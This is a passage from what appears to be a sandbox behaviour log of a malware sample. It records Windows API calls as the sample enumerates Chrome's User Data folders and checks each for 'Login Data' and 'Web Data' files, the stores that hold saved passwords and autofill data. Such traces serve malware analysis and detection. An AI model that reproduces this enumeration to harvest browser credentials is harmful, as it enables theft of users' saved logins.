(in: hFile=0x260, lpFileSizeHigh=0x1962e8 | out: lpFileSizeHigh=0x1962e8*=0x0) returned 0x4800 [0069.342] SetFilePointer (in: hFile=0x260, lDistanceToMove=6144, lpDistanceToMoveHigh=0x1962a8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1962a8*=0) returned 0x1800 [0069.342] ReadFile (in: hFile=0x260, lpBuffer=0x782a74, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x1962c8, lpOverlapped=0x0 | out: lpBuffer=0x782a74*, lpNumberOfBytesRead=0x1962c8*=0x800, lpOverlapped=0x0) returned 1 [0069.342] UnlockFile (hFile=0x260, dwFileOffsetLow=0x40000002, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1fe, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0069.342] CloseHandle (hObject=0x260) returned 1 [0069.342] FindNextFileW (in: hFindFile=0x681bf0, lpFindFileData=0x198b14 | out: lpFindFileData=0x198b14) returned 1 [0069.342] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.342] wcslen (_String="EVWhitelist") returned 0xb [0069.342] wcscpy (in: _Dest=0x198d64, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" [0069.342] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.342] wcscat (in: _Dest=0x198d64, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\" [0069.342] wcscat (in: _Dest=0x198d64, _Source="EVWhitelist" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist" [0069.342] wcscmp (_String1="EVWhitelist", _String2="..") returned 1 [0069.342] wcscmp (_String1="EVWhitelist", _String2=".") returned 1 [0069.342] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\Web Data" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\evwhitelist\\web data")) returned 0xffffffff [0069.342] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist") returned 0x47 [0069.342] wcslen (_String="Login Data") returned 0xa [0069.342] wcscpy (in: _Dest=0x198660, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist" [0069.342] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist") returned 0x47 [0069.342] wcscat (in: _Dest=0x198660, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\" [0069.342] wcscat (in: _Dest=0x198660, _Source="Login Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\Login Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\Login Data" [0069.342] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\Login Data" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\evwhitelist\\login data")) returned 0xffffffff [0069.342] FindNextFileW (in: hFindFile=0x681bf0, lpFindFileData=0x198b14 | out: lpFindFileData=0x198b14) returned 1 [0069.342] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.342] wcslen (_String="FileTypePolicies") returned 0x10 [0069.342] wcscpy (in: _Dest=0x198d64, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" [0069.343] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.343] wcscat (in: _Dest=0x198d64, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\" [0069.343] wcscat (in: _Dest=0x198d64, _Source="FileTypePolicies" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies" [0069.343] wcscmp (_String1="FileTypePolicies", _String2="..") returned 1 [0069.343] wcscmp (_String1="FileTypePolicies", _String2=".") returned 1 [0069.343] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\Web Data" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\filetypepolicies\\web data")) returned 0xffffffff [0069.343] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies") returned 0x4c [0069.343] wcslen (_String="Login Data") returned 0xa [0069.343] wcscpy (in: _Dest=0x198660, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies" [0069.343] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies") returned 0x4c [0069.343] wcscat (in: _Dest=0x198660, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\" [0069.343] wcscat (in: _Dest=0x198660, _Source="Login Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\Login Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\Login Data" [0069.343] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\Login Data" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\filetypepolicies\\login data")) returned 0xffffffff [0069.343] FindNextFileW (in: hFindFile=0x681bf0, lpFindFileData=0x198b14 | out: lpFindFileData=0x198b14) returned 1 [0069.343] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.343] wcslen (_String="First Run") returned 0x9 [0069.343] wcscpy (in: _Dest=0x198d64, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" [0069.343] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.343] wcscat (in: _Dest=0x198d64, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\" [0069.343] wcscat (in: _Dest=0x198d64, _Source="First Run" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\First Run") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\First Run" [0069.343] FindNextFileW (in: hFindFile=0x681bf0, lpFindFileData=0x198b14 | out: lpFindFileData=0x198b14) returned 1 [0069.343] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.343] wcslen (_String="Local State") returned 0xb [0069.343] wcscpy (in: _Dest=0x198d64, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" [0069.343] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.343] wcscat (in: _Dest=0x198d64, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\" [0069.343] wcscat (in: _Dest=0x198d64, _Source="Local State" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Local State") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Local State" [0069.344] FindNextFileW (in: hFindFile=0x681bf0, lpFindFileData=0x198b14 | out: lpFindFileData=0x198b14) returned 1 [0069.344] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.344] wcslen (_String="OriginTrials") returned 0xc [0069.344] wcscpy (in: _Dest=0x198d64, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" [0069.344] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.344] wcscat (in: _Dest=0x198d64, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\" [0069.344] wcscat (in: _Dest=0x198d64, _Source="OriginTrials" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials" [0069.344] wcscmp (_String1="OriginTrials", _String2="..") returned 1 [0069.344] wcscmp (_String1="OriginTrials", _String2=".") returned 1 [0069.344] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\Web Data" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\origintrials\\web data")) returned 0xffffffff [0069.344] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials") returned 0x48 [0069.344] wcslen (_String="Login Data") returned 0xa [0069.344] wcscpy (in: _Dest=0x198660, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials" [0069.344] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials") returned 0x48 [0069.344] wcscat (in: _Dest=0x198660, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\" [0069.344] wcscat (in: _Dest=0x198660, _Source="Login Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\Login Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\Login Data" [0069.344] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\Login Data" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\origintrials\\login data")) returned 0xffffffff [0069.344] FindNextFileW (in: hFindFile=0x681bf0, lpFindFileData=0x198b14 | out: lpFindFileData=0x198b14) returned 1 [0069.344] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.344] wcslen (_String="PepperFlash") returned 0xb [0069.344] wcscpy (in: _Dest=0x198d64, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" [0069.344] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.344] wcscat (in: _Dest=0x198d64, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\" [0069.344] wcscat (in: _Dest=0x198d64, _Source="PepperFlash" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash" [0069.344] wcscmp (_String1="PepperFlash", _String2="..") returned 1 [0069.344] wcscmp (_String1="PepperFlash", _String2=".") returned 1 [0069.344] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\Web Data" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\pepperflash\\web data")) returned 0xffffffff [0069.345] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash") returned 0x47 [0069.345] wcslen (_String="Login Data") returned 0xa [0069.345] wcscpy (in: _Dest=0x198660, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash" [0069.345] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash") returned 0x47 [0069.345] wcscat (in: _Dest=0x198660, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\" [0069.345] wcscat (in: _Dest=0x198660, _Source="Login Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\Login Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\Login Data" [0069.345] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\Login Data" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\pepperflash\\login data")) returned 0xffffffff [0069.345] FindNextFileW (in: hFindFile=0x681bf0, lpFindFileData=0x198b14 | out: lpFindFileData=0x198b14) returned 1 [0069.345] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.345] wcslen (_String="pnacl") returned 0x5 [0069.345] wcscpy (in: _Dest=0x198d64, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" [0069.345] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.345] wcscat (in: _Dest=0x198d64, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\" [0069.345] wcscat (in: _Dest=0x198d64, _Source="pnacl" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl" [0069.345] wcscmp (_String1="pnacl", _String2="..") returned 1 [0069.345] wcscmp (_String1="pnacl", _String2=".") returned 1 [0069.345] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\Web Data" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\pnacl\\web data")) returned 0xffffffff [0069.346] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl") returned 0x41 [0069.346] wcslen (_String="Login Data") returned 0xa [0069.346] wcscpy (in: _Dest=0x198660, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl" [0069.346] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl") returned 0x41 [0069.346] wcscat (in: _Dest=0x198660, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\" [0069.346] wcscat (in: _Dest=0x198660, _Source="Login Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\Login Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\Login Data" [0069.346] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\Login Data" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\pnacl\\login data")) returned 0xffffffff [0069.346] FindNextFileW (in: hFindFile=0x681bf0, lpFindFileData=0x198b14 | out: lpFindFileData=0x198b14) returned 1 [0069.346] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.346] wcslen (_String="Safe Browsing Bloom") returned 0x13 [0069.346] wcscpy (in: _Dest=0x198d64, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" [0069.346] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.346] wcscat (in: _Dest=0x198d64, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\" [0069.346] wcscat (in: _Dest=0x198d64, _Source="Safe Browsing Bloom" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Bloom") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Bloom" [0069.346] FindNextFileW (in: hFindFile=0x681bf0, lpFindFileData=0x198b14 | out: lpFindFileData=0x198b14) returned 1 [0069.346] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.346] wcslen (_String="Safe Browsing Bloom Prefix Set") returned 0x1e [0069.346] wcscpy (in: _Dest=0x198d64, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" [0069.346] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.346] wcscat (in: _Dest=0x198d64, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\" [0069.346] wcscat (in: _Dest=0x198d64, _Source="Safe Browsing Bloom Prefix Set" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Bloom Prefix Set") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Bloom Prefix Set" [0069.346] FindNextFileW (in: hFindFile=0x681bf0, lpFindFileData=0x198b14 | out: lpFindFileData=0x198b14) returned 1 [0069.346] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.346] wcslen (_String="Safe Browsing Channel IDs") returned 0x19 [0069.346] wcscpy (in: _Dest=0x198d64, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" [0069.346] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.346] wcscat (in: _Dest=0x198d64, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\" [0069.346] wcscat (in: _Dest=0x198d64, _Source="Safe Browsing Channel IDs" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs" [0069.346] FindNextFileW (in: hFindFile=0x681bf0, lpFindFileData=0x198b14 | out: lpFindFileData=0x198b14) returned 1 [0069.346] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.346] wcslen (_String="Safe Browsing Channel IDs-journal") returned 0x21 [0069.346] wcscpy (in: _Dest=0x198d64, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" [0069.346] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.346] wcscat (in: _Dest=0x198d64, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\" [0069.346] wcscat (in: _Dest=0x198d64, _Source="Safe Browsing Channel IDs-journal" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs-journal") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs-journal" [0069.346] FindNextFileW (in: hFindFile=0x681bf0, lpFindFileData=0x198b14 | out: lpFindFileData=0x198b14) returned 1 [0069.346] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.346] wcslen (_String="Safe Browsing Cookies") returned 0x15 [0069.346] wcscpy (in: _Dest=0x198d64, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" [0069.346] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.346] wcscat (in: _Dest=0x198d64, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\" [0069.346] wcscat (in: _Dest=0x198d64, _Source="Safe Browsing Cookies" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies" [0069.346] FindNextFileW (in: hFindFile=0x681bf0, lpFindFileData=0x198b14 | out: lpFindFileData=0x198b14) returned 1 [0069.346] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.346] wcslen (_String="Safe Browsing Cookies-journal") returned 0x1d [0069.346] wcscpy (in: _Dest=0x198d64, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" [0069.346] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.347] wcscat (in: _Dest=0x198d64, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\" [0069.347] wcscat (in: _Dest=0x198d64, _Source="Safe Browsing Cookies-journal" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies-journal") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies-journal" [0069.347] FindNextFileW (in: hFindFile=0x681bf0, 